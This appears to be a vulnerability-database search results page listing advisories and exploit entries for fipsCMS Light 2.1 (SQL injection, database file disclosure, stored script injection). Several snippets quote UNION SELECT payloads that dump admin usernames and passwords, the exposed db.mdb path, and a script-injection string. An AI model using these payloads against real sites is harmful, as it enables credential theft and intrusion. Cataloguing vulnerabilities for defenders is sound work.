Lucene search
K

15 matches found

EUVD
EUVD
added 2025/10/07 12:30 a.m.5 views

EUVD-2009-2018

Malware in sbrugna...

5CVSS6.4AI score0.05159EPSS
Exploits0References3
EUVD
EUVD
added 2025/10/07 12:30 a.m.5 views

EUVD-2008-3403

Malware in sbrugna...

7.5CVSS6.4AI score0.01042EPSS
Exploits0References6
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.20 views

fipsCMS light <= 2.1 (r) Remote SQL Injection Vulnerability

No description provided by source. Exploit Code: victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin http://localhost:2222/lab/cms/admin...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2009/07/01 12:0 a.m.28 views

fipsCMS Light 2.1 Database Disclosure

!/usr/bin/perl fipsCMS Light 2.1 Arbitrary Database Disclosure Exploit Exploit by d3b4g script:http://fipsasp.com Demo: http://demo.fipsasp.com/fipsCMSlight/fipsdb/db.mdb From Tiny little island of maldivies use LWP::Simple; use LWP::UserAgent; print "\fipsCMS Light 2.1 Arbitrary Database...

7.4AI score
Exploits0
Prion
Prion
added 2009/06/09 7:30 p.m.15 views

Improper access control

fipsCMS Light 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file and obtain sensitive information via a direct request for fipsdb/db.mdb...

5CVSS6.9AI score0.05159EPSS
Exploits0References2Affected Software1
NVD
NVD
added 2009/06/09 7:30 p.m.14 views

CVE-2009-2022

fipsCMS Light 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file and obtain sensitive information via a direct request for fipsdb/db.mdb...

5CVSS6.3AI score0.05159EPSS
Exploits0References2
Cvelist
Cvelist
added 2009/06/09 7:0 p.m.21 views

CVE-2009-2022

fipsCMS Light 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file and obtain sensitive information via a direct request for fipsdb/db.mdb...

6.3AI score0.05159EPSS
Exploits0References2
Packet Storm
Packet Storm
added 2009/06/08 12:0 a.m.19 views

fipsCMS Light 2.1 Database Disclosure

@=======================================@ ====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG===== @=======================================@ @=Author : ByALBAYX @=Website : WWW.C4TEAM.ORG @===============TURKISH=================@ @=======================================@ @=Script : fipsCMS Light 2.1 @=S.Sit...

0.1AI score
Exploits0
exploitpack
exploitpack
added 2009/06/08 12:0 a.m.14 views

FipsCMS Light 2.1 - db.mdb Remote Database Disclosure

FipsCMS Light 2.1 - db.mdb Remote Database Disclosure @=======================================@ ====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG===== @=======================================@ @=Author : ByALBAYX @=Website : WWW.C4TEAM.ORG @===============TURKISH=================@...

0.2AI score
Exploits0
Exploit DB
Exploit DB
added 2009/06/08 12:0 a.m.39 views

FipsCMS Light 2.1 - &#039;db.mdb&#039; Remote Database Disclosure

@=======================================@ ====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG===== @=======================================@ @=Author : ByALBAYX @=Website : WWW.C4TEAM.ORG @===============TURKISH=================@ @=======================================@ @=Script : fipsCMS Light 2.1 @=S.Sit...

7AI score
Exploits0
NVD
NVD
added 2008/07/31 5:41 p.m.20 views

CVE-2008-3417

SQL injection vulnerability in home/index.asp in fipsCMS light 2.1 and earlier allows remote attackers to execute arbitrary SQL commands via the r parameter, a different vector than CVE-2006-6115 and CVE-2007-2561...

7.5CVSS8.1AI score0.01042EPSS
Exploits0References5
Packet Storm
Packet Storm
added 2008/07/28 12:0 a.m.27 views

fipscmslight-sql.txt

Exploit Code: victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin http://localhost:2222/lab/cms/admin Download:http://login.fipsasp.com/File.asp?ID=60&CatID=5 Foun...

7.4AI score
Exploits0
0day.today
0day.today
added 2008/07/26 12:0 a.m.23 views

fipsCMS light <= 2.1 (r) Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications =========================================================== fipsCMS light = 2.1 r Remote SQL Injection Vulnerability =========================================================== Exploit Code: victim/path/home/index.asp?w=pages&r=9999999 uni...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2008/07/26 12:0 a.m.42 views

FipsCMS Light 2.1 - &#039;r&#039; SQL Injection

Exploit Code: victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin http://localhost:2222/lab/cms/admin Download:http://login.fipsasp.com/File.asp?ID=60&CatID=5 Foun...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2005/11/15 12:0 a.m.32 views

fipsCMS light - vulnerable to script injection.

fipsCMS lights is a freeware product of fipsasp.com. If you log on as admin, you can generate new pages in the CMS system. If you inject the "headline" field with scriptingcode like scriptalert‘code executed’/script, this will automaticly launch when a users visits that site. Please credit to:...

1.9AI score
Exploits0
Rows per page
Query Builder